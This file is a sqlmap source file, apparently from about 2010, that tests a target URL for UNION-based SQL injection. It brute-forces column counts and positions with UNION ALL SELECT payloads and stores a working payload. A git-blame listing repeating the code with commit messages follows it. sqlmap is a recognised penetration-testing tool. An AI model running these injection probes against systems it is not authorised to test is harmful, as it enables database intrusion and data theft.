sqlmap/lib/techniques/inband/union/test.py

#!/usr/bin/env python

"""
$Id$

Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.agent import agent
from lib.core.common import randomStr
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD
from lib.core.session import setUnion
from lib.core.unescaper import unescaper
from lib.parse.html import htmlParser
from lib.request.connect import Connect as Request

def __unionPosition(negative=False, count=None, comment=None):
    validPayload = None

    if count is None:
        count = kb.unionCount

    # For each column of the table (# of NULL) perform a request using
    # the UNION ALL SELECT statement to test it the target url is
    # affected by an exploitable inband SQL injection vulnerability
    for exprPosition in range(0, count):
        # Prepare expression with delimiters
        randQuery = randomStr()
        randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
        randQueryUnescaped = unescaper.unescape(randQueryProcessed)

        # Forge the inband SQL injection request
        query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition, count=count, comment=comment)
        payload = agent.payload(newValue=query, negative=negative)

        # Perform the request
        resultPage, _ = Request.queryPage(payload, content=True)

        if resultPage and randQuery in resultPage:
            setUnion(position=exprPosition)
            validPayload = payload

            break

    return validPayload

def __unionConfirm(count=None, comment=None):
    validPayload = None

    # Confirm the inband SQL injection and get the exact column
    # position which can be used to extract data
    if not isinstance(kb.unionPosition, int):
        debugMsg = "testing full inband with %s columns" % count
        logger.debug(debugMsg)

        validPayload = __unionPosition(count=count, comment=comment)

        # Assure that the above function found the exploitable full inband
        # SQL injection position
        if not isinstance(kb.unionPosition, int):
            debugMsg = "testing single-entry inband value with %s columns" % count
            logger.debug(debugMsg)

            validPayload = __unionPosition(negative=True, count=count, comment=comment)

            # Assure that the above function found the exploitable partial
            # (single entry) inband SQL injection position with negative
            # parameter validPayload
            if not isinstance(kb.unionPosition, int):
                return None
            else:
                setUnion(negative=True)

    return validPayload

def __unionTestByCharBruteforce(comment):
    """
    This method tests if the target url is affected by an inband
    SQL injection vulnerability. The test is done up to 50 columns
    on the target database table
    """

    query = agent.prefixQuery("UNION ALL SELECT %s" % conf.uChar)

    for count in range(conf.uColsStart, conf.uColsStop+1):
        if kb.dbms == DBMS.ORACLE and query.endswith(" FROM DUAL"):
            query = query[:-len(" FROM DUAL")]

        if count:
            query += ", %s" % conf.uChar

        if kb.dbms == DBMS.ORACLE:
            query += " FROM DUAL"

        validPayload = __unionConfirm(count, comment)

        if validPayload:
            setUnion(count=count)
            break

    return validPayload

def unionTest():
    """
    This method tests if the target url is affected by an inband
    SQL injection vulnerability. The test is done up to 3*50 times
    """

    if conf.direct:
        return

    if kb.unionTest is not None:
        return kb.unionTest

    oldTechnique = kb.technique
    kb.technique = PAYLOAD.TECHNIQUE.UNION

    if conf.uChar == "NULL":
        technique = "NULL bruteforcing"
    else:
        technique = "char (%s) bruteforcing" % conf.uChar

    infoMsg  = "testing inband sql injection on parameter "
    infoMsg += "'%s' with %s technique" % (kb.injection.parameter, technique)
    logger.info(infoMsg)

    comment = queries[kb.dbms].comment.query
    validPayload = __unionTestByCharBruteforce(comment)

    if validPayload:
        validPayload = agent.removePayloadDelimiters(validPayload, False)
        setUnion(char=conf.uChar)
        setUnion(comment=comment)
        setUnion(payload=validPayload)

    if kb.unionTest is not None:
        infoMsg = "the target url is affected by an exploitable "
        infoMsg += "inband sql injection vulnerability "
        infoMsg += "on parameter '%s' with %d columns" % (kb.injection.parameter, kb.unionCount)
        logger.info(infoMsg)
    else:
        infoMsg = "the target url is not affected by an exploitable "
        infoMsg += "inband sql injection vulnerability "
        infoMsg += "on parameter '%s'" % kb.injection.parameter
        logger.info(infoMsg)
        kb.technique = oldTechnique

    return kb.unionTest
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`#!/usr/bin/env python`

			`"""`
propsets.. 2008-10-15 19:56:32 +04:00			$Id$
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
large commit with copyright header modifications 2010-10-14 18:41:14 +04:00			`Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)`
sorry, cosmetics 2010-10-15 03:18:29 +04:00			`See the file 'doc/COPYING' for copying permission`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`

			`from lib.core.agent import agent`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.common import randomStr`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
Minor improvement when testing for UNION query SQL injection to check only without comment and with DBMS specific comment (not anymore "random" unspecific comment characters) 2008-12-02 02:09:07 +03:00			`from lib.core.data import queries`
further refactoring (all enumerations are now put into enums.py) 2010-11-08 12:20:02 +03:00			`from lib.core.enums import DBMS`
minor update 2010-12-08 16:09:27 +03:00			`from lib.core.enums import PAYLOAD`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.session import setUnion`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.unescaper import unescaper`
			`from lib.parse.html import htmlParser`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.request.connect import Connect as Request`

Got rid of UNION false cond 2010-12-05 19:16:15 +03:00			`def __unionPosition(negative=False, count=None, comment=None):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = None`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`if count is None:`
			`count = kb.unionCount`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# For each column of the table (# of NULL) perform a request using`
			`# the UNION ALL SELECT statement to test it the target url is`
			`# affected by an exploitable inband SQL injection vulnerability`
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`for exprPosition in range(0, count):`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`# Prepare expression with delimiters`
			`randQuery = randomStr()`
			`randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)`
			`randQueryUnescaped = unescaper.unescape(randQueryProcessed)`

			`# Forge the inband SQL injection request`
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition, count=count, comment=comment)`
Got rid of UNION false cond 2010-12-05 19:16:15 +03:00			`payload = agent.payload(newValue=query, negative=negative)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Perform the request`
			`resultPage, _ = Request.queryPage(payload, content=True)`

Another bug fix for --union-test 2010-11-14 18:39:57 +03:00			`if resultPage and randQuery in resultPage:`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`setUnion(position=exprPosition)`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = payload`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`break`

Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`return validPayload`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`def __unionConfirm(count=None, comment=None):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = None`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`# Confirm the inband SQL injection and get the exact column`
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`# position which can be used to extract data`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`if not isinstance(kb.unionPosition, int):`
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`debugMsg = "testing full inband with %s columns" % count`
			`logger.debug(debugMsg)`

			`validPayload = __unionPosition(count=count, comment=comment)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Assure that the above function found the exploitable full inband`
			`# SQL injection position`
			`if not isinstance(kb.unionPosition, int):`
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`debugMsg = "testing single-entry inband value with %s columns" % count`
			`logger.debug(debugMsg)`

			`validPayload = __unionPosition(negative=True, count=count, comment=comment)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Assure that the above function found the exploitable partial`
Major bug fix to --union-test 2010-10-26 03:39:55 +04:00			`# (single entry) inband SQL injection position with negative`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`# parameter validPayload`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`if not isinstance(kb.unionPosition, int):`
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`return None`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`else:`
Major bug fix to --union-test 2010-10-26 03:39:55 +04:00			`setUnion(negative=True)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`return validPayload`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
Added new switch --union-char to be able to provide the character used in union-test and exploit (default is still NULL, but can be any) 2010-11-19 17:56:20 +03:00			`def __unionTestByCharBruteforce(comment):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`
			`This method tests if the target url is affected by an inband`
			`SQL injection vulnerability. The test is done up to 50 columns`
			`on the target database table`
			`"""`

Added new switch --union-char to be able to provide the character used in union-test and exploit (default is still NULL, but can be any) 2010-11-19 17:56:20 +03:00			`query = agent.prefixQuery("UNION ALL SELECT %s" % conf.uChar)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Improved --union-cols to accept a range to test for union SQL injection. By default it is 1-20. 2010-11-19 18:48:24 +03:00			`for count in range(conf.uColsStart, conf.uColsStop+1):`
refactoring of hard coded dbms names 2010-11-02 14:59:24 +03:00			`if kb.dbms == DBMS.ORACLE and query.endswith(" FROM DUAL"):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`query = query[:-len(" FROM DUAL")]`

			`if count:`
Added new switch --union-char to be able to provide the character used in union-test and exploit (default is still NULL, but can be any) 2010-11-19 17:56:20 +03:00			`query += ", %s" % conf.uChar`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
refactoring of hard coded dbms names 2010-11-02 14:59:24 +03:00			`if kb.dbms == DBMS.ORACLE:`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`query += " FROM DUAL"`

Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`validPayload = __unionConfirm(count, comment)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`if validPayload:`
			`setUnion(count=count)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`break`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`return validPayload`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
			`def unionTest():`
			`"""`
			`This method tests if the target url is affected by an inband`
			`SQL injection vulnerability. The test is done up to 3*50 times`
			`"""`

Major enhancement to directly connect to the dbms without passing via a sql injection: adapted code accordingly - see #158. This feature relies on python third-party libraries to be able to connect to the database. For the moment it has been implemented for MySQL (with python-mysqldb module) and PostgreSQL (with python-psycopg2 module). Minor layout adjustments. 2010-03-27 02:23:25 +03:00			`if conf.direct:`
			`return`

Consistency between --*-test switches/output 2010-11-08 19:46:25 +03:00			`if kb.unionTest is not None:`
			`return kb.unionTest`
Minor bug fix to correctly resuming --union-test results from session file. 2010-05-19 18:21:59 +04:00
Bug fix for --union-test 2010-12-03 17:57:30 +03:00			`oldTechnique = kb.technique`
minor update 2010-12-08 16:09:27 +03:00			`kb.technique = PAYLOAD.TECHNIQUE.UNION`
Bug fix for --union-test 2010-12-03 17:57:30 +03:00
Got rid of unreliable 'ORDER BY' technique to detect UNION query SQL injection, consequently switch --union-tech has gone now. Minor code refactoring too. 2010-11-29 20:18:38 +03:00			`if conf.uChar == "NULL":`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`technique = "NULL bruteforcing"`
Added new switch --union-char to be able to provide the character used in union-test and exploit (default is still NULL, but can be any) 2010-11-19 17:56:20 +03:00			`else:`
			`technique = "char (%s) bruteforcing" % conf.uChar`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`infoMsg = "testing inband sql injection on parameter "`
Rewrite from scratch the detection engine. Now it performs checks defined in payload.xml. User can specify its own. All (hopefully) functionalities should still be working. Added two switches, --level and --risk to specify which injection tests and boundaries to use. The main advantage now is that sqlmap is able to identify initially which injection types are present so for instance if boolean-based blind is not supported, but error-based is, sqlmap will keep going and work! 2010-11-28 21:10:54 +03:00			`infoMsg += "'%s' with %s technique" % (kb.injection.parameter, technique)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`logger.info(infoMsg)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Improved --union-cols to accept a range to test for union SQL injection. By default it is 1-20. 2010-11-19 18:48:24 +03:00			`comment = queries[kb.dbms].comment.query`
Got rid of unreliable 'ORDER BY' technique to detect UNION query SQL injection, consequently switch --union-tech has gone now. Minor code refactoring too. 2010-11-29 20:18:38 +03:00			`validPayload = __unionTestByCharBruteforce(comment)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Improved --union-cols to accept a range to test for union SQL injection. By default it is 1-20. 2010-11-19 18:48:24 +03:00			`if validPayload:`
Store and resume also UNION char to session file (--union-char) 2010-12-01 13:59:58 +03:00			`validPayload = agent.removePayloadDelimiters(validPayload, False)`
			`setUnion(char=conf.uChar)`
Improved --union-cols to accept a range to test for union SQL injection. By default it is 1-20. 2010-11-19 18:48:24 +03:00			`setUnion(comment=comment)`
Store and resume also UNION char to session file (--union-char) 2010-12-01 13:59:58 +03:00			`setUnion(payload=validPayload)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Store and resume also UNION char to session file (--union-char) 2010-12-01 13:59:58 +03:00			`if kb.unionTest is not None:`
			`infoMsg = "the target url is affected by an exploitable "`
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`infoMsg += "inband sql injection vulnerability "`
Rewrite from scratch the detection engine. Now it performs checks defined in payload.xml. User can specify its own. All (hopefully) functionalities should still be working. Added two switches, --level and --risk to specify which injection tests and boundaries to use. The main advantage now is that sqlmap is able to identify initially which injection types are present so for instance if boolean-based blind is not supported, but error-based is, sqlmap will keep going and work! 2010-11-28 21:10:54 +03:00			`infoMsg += "on parameter '%s' with %d columns" % (kb.injection.parameter, kb.unionCount)`
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`logger.info(infoMsg)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`else:`
Store and resume also UNION char to session file (--union-char) 2010-12-01 13:59:58 +03:00			`infoMsg = "the target url is not affected by an exploitable "`
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`infoMsg += "inband sql injection vulnerability "`
Rewrite from scratch the detection engine. Now it performs checks defined in payload.xml. User can specify its own. All (hopefully) functionalities should still be working. Added two switches, --level and --risk to specify which injection tests and boundaries to use. The main advantage now is that sqlmap is able to identify initially which injection types are present so for instance if boolean-based blind is not supported, but error-based is, sqlmap will keep going and work! 2010-11-28 21:10:54 +03:00			`infoMsg += "on parameter '%s'" % kb.injection.parameter`
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`logger.info(infoMsg)`
Bug fix for --union-test 2010-12-03 17:57:30 +03:00			`kb.technique = oldTechnique`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Consistency between --*-test switches/output 2010-11-08 19:46:25 +03:00			`return kb.unionTest`